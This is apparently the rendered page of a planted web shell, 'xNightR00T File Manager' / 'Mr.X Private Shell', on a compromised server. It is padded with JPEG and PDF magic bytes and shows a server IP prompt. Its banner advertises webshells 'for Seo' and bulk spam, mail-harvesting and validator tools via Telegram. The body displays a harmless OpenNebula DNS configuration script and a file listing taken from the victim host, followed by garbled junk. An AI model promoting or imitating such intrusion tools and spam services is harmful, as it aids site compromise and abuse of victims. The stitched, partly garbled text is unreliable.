xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/usr/bin/env bash

# -------------------------------------------------------------------------- #
# Copyright 2002-2020, OpenNebula Project, OpenNebula Systems                #
#                                                                            #
# Licensed under the Apache License, Version 2.0 (the "License"); you may    #
# not use this file except in compliance with the License. You may obtain    #
# a copy of the License at                                                   #
#                                                                            #
# http://www.apache.org/licenses/LICENSE-2.0                                 #
#                                                                            #
# Unless required by applicable law or agreed to in writing, software        #
# distributed under the License is distributed on an "AS IS" BASIS,          #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.   #
# See the License for the specific language governing permissions and        #
# limitations under the License.                                             #
#--------------------------------------------------------------------------- #

export DNS_VARIABLES="DNS $(env | sed 's/=.*$//' | grep -E '^ETH[0-9]+_DNS$' | sort)"

export SEARCH_VARIABLES="SEARCH_DOMAIN $(env | sed 's/=.*$//' | grep -E '^ETH[0-9]+_SEARCH_DOMAIN$' | sort)"

nameservers=$(
    for var in ${DNS_VARIABLES}; do
        value=$(eval "echo \"\${$var}\"")
        if [ -n "$value" ]; then
            echo "$value"
        fi
    done
)

searchdomains=$(
    for var in ${SEARCH_VARIABLES}; do
        value=$(eval "echo \"\${$var}\"")
        if [ -n "$value" ]; then
            echo "$value"
        fi
    done
)

[ -z "$nameservers" ] && exit 0

if [ -L /etc/resolv.conf ]; then
    unlink /etc/resolv.conf
else
    echo -n '' > /etc/resolv.conf
fi

for nameserver in $nameservers; do
    echo nameserver $nameserver >> /etc/resolv.conf
done

if [ -f /etc/sysconfig/network/config ]; then
    sed -i "/^NETCONFIG_DNS_STATIC_SERVERS=/ s/=.*$/=\"$nameservers\"/" /etc/sysconfig/network/config
fi

[ -z "$searchdomains" ] && exit 0

echo search $searchdomains >> /etc/resolv.conf

if [ -f /etc/sysconfig/network/config ]; then
    sed -i "/^NETCONFIG_DNS_STATIC_SEARCHLIST=/ s/=.*$/=\"$searchdomains\"/" /etc/sysconfig/network/config
fi

Filemanager

Name Type Size Permission Actions
loc-05-grow-rootfs File 3.18 KB 0755
loc-09-timezone File 1.72 KB 0755
loc-10-network File 8.26 KB 0755
loc-10-network-pci File 3.3 KB 0755
loc-11-dns File 2.32 KB 0755
loc-14-mount-swap File 1.45 KB 0755
loc-16-gen-env File 1.95 KB 0755
loc-20-set-username-password File 3.62 KB 0755
loc-22-ssh_public_key File 2.11 KB 0755
loc-30-console File 1.31 KB 0755
loc-35-securetty File 2.05 KB 0755
net-15-hostname File 5.41 KB 0755
net-97-start-script File 1.69 KB 0755
net-98-execute-scripts File 1.52 KB 0755
net-99-report-ready File 2.07 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1